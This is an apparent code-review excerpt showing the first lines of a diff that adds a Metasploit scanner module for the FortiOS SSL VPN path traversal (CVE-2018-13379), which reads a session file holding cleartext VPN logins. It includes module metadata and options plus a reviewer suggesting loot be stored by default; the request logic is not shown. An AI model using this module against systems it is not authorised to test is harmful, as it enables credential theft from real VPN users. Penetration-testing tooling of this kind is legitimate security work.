modules/auxiliary/scanner/http/fortios_vpnssl_traversal_leak.rb

```diff
@@ -0,0 +1,184 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Post::File
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'FortiOS Path Traversal Leak Credentials',
+      'Description' => %q{
+        FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.
+        A path traversal vulnerability in the FortiOS SSL VPN web portal may allow an unauthenticated
+        attacker to download FortiOS system files through specially crafted HTTP resource requests.
+        This exploit read `/dev/cmdb/sslvpn_websession` file, this file contains login and passwords in (clear/text).
+        This vulnerability affect (FortiOS 5.4.6 to 5.4.12, FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4).
+      },
+      'References' => [
+        ['CVE', '2018-13379'],
+        ['URL', 'https://www.fortiguard.com/psirt/FG-IR-18-384'],
+        ['URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379'],
+        ['EDB', '47287'],
+        ['EDB', '47288']
+      ],
+      'Author' => [
+        'lynx (Carlos Vieira)',         # initial module author from edb
+        'mekhalleh (RAMELLA Sébastien)' # this module author (Zeop Entreprise)
+      ],
+      'License' => MSF_LICENSE,
+      'DefaultOptions' => {
+        'RPORT' => 443,
+        'SSL' => true
+      },
+    ))
+
+    register_options([
+      OptEnum.new('DUMP_FORMAT', [true,  'Dump format.', 'raw', ['raw', 'ascii']]),
+      OptBool.new('STORE_CRED', [false, 'Store credential into the database.', true]),
+      OptBool.new('STORE_LOOT', [false, 'Store dump in loot.', false]),
```

Comment:
Is there a reason to not store the loot by default?

```suggestion
      OptBool.new('STORE_LOOT', [false, 'Store dump in loot.', true]),
```